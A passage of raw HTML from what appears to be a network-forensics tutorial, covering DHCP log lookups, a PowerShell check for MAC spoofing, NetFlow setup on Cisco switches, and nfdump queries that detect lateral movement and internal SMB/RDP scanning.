13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"    MAC:      </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">result</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'mac'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"    Lease:    </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">result</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'lease_start'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> → </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">result</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'lease_end'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation\"> </span><span class=\"token string-interpolation interpolation keyword\" style=\"color:hsl(356, 75%, 47%)\">or</span><span class=\"token string-interpolation interpolation\"> </span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'Active'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[-] No DHCP record for </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">investigation_ip</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> at </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">investigation_time</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"    Possible: static IP, rogue device, or DHCP logs pre-date the event\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"34-detecting-rogue-devices-and-mac-spoofing-in-dhcp-logs\">3.4 Detecting Rogue Devices and MAC Spoofing in DHCP Logs<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#34-detecting-rogue-devices-and-mac-spoofing-in-dhcp-logs\" class=\"hash-link\" aria-label=\"Direct link to 3.4 Detecting Rogue Devices and MAC Spoofing in DHCP Logs\" title=\"Direct link to 3.4 Detecting Rogue Devices and MAC Spoofing in DHCP Logs\" translate=\"no\">​</a></h3>\n<p>A common attacker technique is bringing a rogue device onto the network or spoofing a MAC address. DHCP logs expose both:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Detect MAC addresses seen with multiple different hostnames (MAC reuse or spoofing)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$dhcpLogDir = \"C:\\Windows\\System32\\dhcp\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$assignEvents = @()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-ChildItem \"$dhcpLogDir\\DhcpSrvLog-*.log\" | ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Get-Content $_.FullName | Where-Object { $_ -match '^10,' } |  # Event ID 10 = Assign</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $parts = $_ -split ','</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        if ($parts.Count -ge 7 -and $parts[6] -ne '') {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $assignEvents += [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Timestamp  = \"$($parts[1]) $($parts[2])\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                IP         = $parts[4]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Hostname   = $parts[5]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                MAC        = $parts[6]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># MAC with multiple hostnames = suspicious</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$assignEvents |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Group-Object MAC |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Where-Object { ($_.Group.Hostname | Sort-Object -Unique).Count -gt 1 } |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $hostnames = ($_.Group.Hostname | Sort-Object -Unique) -join ', '</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Warning \"MAC $($_.Name) seen with multiple hostnames: $hostnames\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $_.Group | Sort-Object Timestamp | Select-Object Timestamp, IP, Hostname, MAC |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            Format-Table -AutoSize</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-4--netflow-analysis-reading-east-west-traffic-without-a-tap\">Part 4  NetFlow Analysis: Reading East-West Traffic Without a Tap<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-4--netflow-analysis-reading-east-west-traffic-without-a-tap\" class=\"hash-link\" aria-label=\"Direct link to Part 4  NetFlow Analysis: Reading East-West Traffic Without a Tap\" title=\"Direct link to Part 4  NetFlow Analysis: Reading East-West Traffic Without a Tap\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"41-what-netflow-records-contain\">4.1 What NetFlow Records Contain<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#41-what-netflow-records-contain\" class=\"hash-link\" aria-label=\"Direct link to 4.1 What NetFlow Records Contain\" title=\"Direct link to 4.1 What NetFlow Records Contain\" translate=\"no\">​</a></h3>\n<p>NetFlow (Cisco's original protocol) and its successors IPFIX and sFlow record <strong>connection metadata</strong>  not packet content. For each network flow (defined as packets sharing the same 5-tuple: source IP, destination IP, source port, destination port, protocol), NetFlow records:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">NetFlow v9 / IPFIX Record Fields:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">──────────────────────────────────────────────────────────────────</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Field               Type      Forensic Value</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">──────────────────────────────────────────────────────────────────</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">src_addr            IPv4/6    Source IP address</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">dst_addr            IPv4/6    Destination IP address</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">src_port            uint16    Source port (ephemeral for clients)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">dst_port            uint16    Destination port (service identifier)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">protocol            uint8     6=TCP, 17=UDP, 1=ICMP</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">flow_start          datetime  When the flow began</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">flow_end            datetime  When the flow ended</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">in_bytes            uint64    Bytes from src to dst</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">out_bytes           uint64    Bytes from dst to src (bidirectional flows)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">tcp_flags           uint8     SYN, ACK, RST, FIN combinations</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">input_snmp          uint32    Router interface index (ingress)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">output_snmp         uint32    Router interface index (egress)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">──────────────────────────────────────────────────────────────────</span><br></span></code></pre></div></div>\n<p>What NetFlow does NOT contain: packet payload, request/response content, authentication details, or process names. It tells you that a connection happened, when, for how long, and how much data moved. Combined with DHCP and auth logs, this is sufficient to reconstruct lateral movement.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"42-enabling-netflow-on-common-platforms\">4.2 Enabling NetFlow on Common Platforms<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#42-enabling-netflow-on-common-platforms\" class=\"hash-link\" aria-label=\"Direct link to 4.2 Enabling NetFlow on Common Platforms\" title=\"Direct link to 4.2 Enabling NetFlow on Common Platforms\" translate=\"no\">​</a></h3>\n<p>If NetFlow is not already configured, enabling it retroactively gives you forward coverage. It does not recover historical data.</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Cisco IOS  enable NetFlow on internal switch interfaces</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ip flow-export destination 10.10.1.100 9995    ! SIEM / flow collector IP and port</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ip flow-export version 9</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ip flow-export source GigabitEthernet0/0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">interface GigabitEthernet0/1                   ! Repeat for each internal-facing interface</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"> ip flow ingress</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"> ip flow egress</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">! Verify:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">show ip flow export</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">show ip cache flow</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Cisco NX-OS (datacenter switches):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">feature netflow</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">flow record SECURITY-RECORD</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  match ipv4 source address</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  match ipv4 destination address</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  match transport source-port</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  match transport destination-port</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  match ip protocol</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  collect counter bytes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  collect counter packets</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  collect transport tcp flags</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  collect timestamp sys-uptime first</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  collect timestamp sys-uptime last</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">flow exporter SIEM-EXPORT</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  destination 10.10.1.100</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  transport udp 9995</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  version 9</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">flow monitor SECURITY-MONITOR</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  record SECURITY-RECORD</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  exporter SIEM-EXPORT</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  cache timeout active 60</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">interface Ethernet1/1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  ip flow monitor SECURITY-MONITOR input</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  ip flow monitor SECURITY-MONITOR output</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"43-netflow-queries-for-lateral-movement-detection\">4.3 NetFlow Queries for Lateral Movement Detection<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#43-netflow-queries-for-lateral-movement-detection\" class=\"hash-link\" aria-label=\"Direct link to 4.3 NetFlow Queries for Lateral Movement Detection\" title=\"Direct link to 4.3 NetFlow Queries for Lateral Movement Detection\" translate=\"no\">​</a></h3>\n<p>Most enterprises store NetFlow in a collector (SolarWinds NTA, Elastic with Logstash, Splunk stream, open-source ntopng/nfdump). The following queries work with nfdump (open-source command-line NetFlow analyzer):</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># nfdump is installed on most Linux-based flow collectors</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># NetFlow files typically stored in: /var/cache/nfdump/ or /opt/nfdump/data/</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ─── SCENARIO 1: Find all connections FROM a known compromised host ───</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Replace 10.10.5.42 with the source IP you're investigating</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/2025/11/15/ </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-t</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"2025-11-15 00:00:00-2025-11-15 23:59:59\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%ts %te %sa %da %dp %pr %byt %pkt %flg\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"src ip 10.10.5.42 and not dst ip 10.10.5.42\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">sort</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-k4</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Sort by destination IP to group lateral targets</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ─── SCENARIO 2: Detect internal port scanning ───</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># High number of unique destinations on the same port = scanning</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/2025/11/15/ </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%sa %da %dp %pr %flg\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"src net 10.10.0.0/16 and dst net 10.10.0.0/16 and \\</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">    (dst port 445 or dst port 135 or dst port 3389 or dst port 5985)\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">awk</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'{print $1\" \"$3}'</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Source IP + Destination Port</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">sort</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">uniq</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-c</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">sort</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-rn</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">head</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-30</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Output: count src_ip dst_port</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># High counts on port 445 from single source = SMB scanning = BloodHound or lateral prep</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ─── SCENARIO 3: Find SMB connections (port 445) between workstations ───</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Workstation-to-workstation SMB is almost never legitimate in modern environments</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Adjust subnet ranges for your network</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 